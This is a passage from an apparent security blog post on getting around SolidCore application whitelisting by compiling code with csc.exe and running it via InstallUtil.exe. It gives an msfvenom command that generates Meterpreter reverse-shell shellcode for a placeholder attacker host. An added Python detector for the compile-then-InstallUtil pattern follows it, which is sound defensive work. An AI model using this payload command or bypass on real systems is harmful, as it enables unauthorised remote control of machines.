Bypassing Application Whitelisting Solution SolidCore Part II
Execution of Malicious Code without Disabling SolidCore Service
In these scenarios, our goal is not to disable SolidCore, but to run unauthorized code while the SolidCore service is still running.
Using ASP.NET Framework Utilities csc.exe and InstallUtil.exe
In this attack scenario, we write some nifty code and compile it on the system itself. csc.exe is the C# compiler, located in “C:\Windows\Microsoft.NET\Framework\v2.0.50727\”.
Its location might vary depending on the exact configuration of a particular computer. If more than one version of the .NET Framework is installed on your computer, you’ll find multiple versions of this file.
To get a reverse shell, we created shellcode using the “msfvenom” utility:
msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerip lport=443 -f csharp > shellcode.txt
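From the defender's side, the csc.exe and InstallUtil.exe pairing described above can be spotted in process-creation telemetry. The Python code below is an added example, not part of the original post: it flags InstallUtil.exe loading an assembly that csc.exe compiled earlier on the same host, matching any installed Framework version directory. The event fields (host, time, image, cmdline) and all sample events are constructed assumptions.

```python
import re
from ntpath import basename

# csc.exe / InstallUtil.exe under any installed Framework or Framework64 version.
DOTNET_TOOL = re.compile(
    r"\\microsoft\.net\\framework(?:64)?\\v[\d.]+\\(csc|installutil)\.exe$",
    re.IGNORECASE)
OUT_FLAG = re.compile(r'[/-]out:(?:"([^"]+)"|(\S+))', re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')

# Constructed process-creation events (field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2024-01-01T10:00:00",
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "cmdline": r"csc.exe /out:C:\Users\Public\upd.exe upd.cs"},
    {"host": "WS01", "time": "2024-01-01T10:00:30",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe C:\Users\Public\upd.exe"},
    {"host": "WS02", "time": "2024-01-01T11:00:00",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /target:library /out:report.dll report.cs"},
    {"host": "WS02", "time": "2024-01-01T11:05:00",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"'},
]

def tool_name(image):
    """Return 'csc' or 'installutil' for a .NET Framework tool path, else None."""
    m = DOTNET_TOOL.search(image)
    return m.group(1).lower() if m else None

def find_compile_then_install(events):
    """Pair each InstallUtil run with an earlier csc.exe run on the same host
    whose /out: file name matches one of InstallUtil's arguments."""
    compiled, alerts = {}, []          # compiled: (host, file name) -> csc event
    for ev in sorted(events, key=lambda e: e["time"]):
        tool = tool_name(ev["image"])
        if tool == "csc":
            m = OUT_FLAG.search(ev["cmdline"])
            if m:
                out = basename(m.group(1) or m.group(2)).lower()
                compiled[(ev["host"], out)] = ev
        elif tool == "installutil":
            for tok in TOKEN.findall(ev["cmdline"])[1:]:   # skip the executable
                key = (ev["host"], basename(tok.strip('"')).lower())
                if key in compiled:
                    alerts.append((compiled[key], ev))
    return alerts

if __name__ == "__main__":
    for csc_ev, iu_ev in find_compile_then_install(SAMPLE_EVENTS):
        print(iu_ev["host"], csc_ev["cmdline"], "->", iu_ev["cmdline"])
```

Matching is by output file name only, so a csc.exe run without an explicit /out: switch is not tracked here.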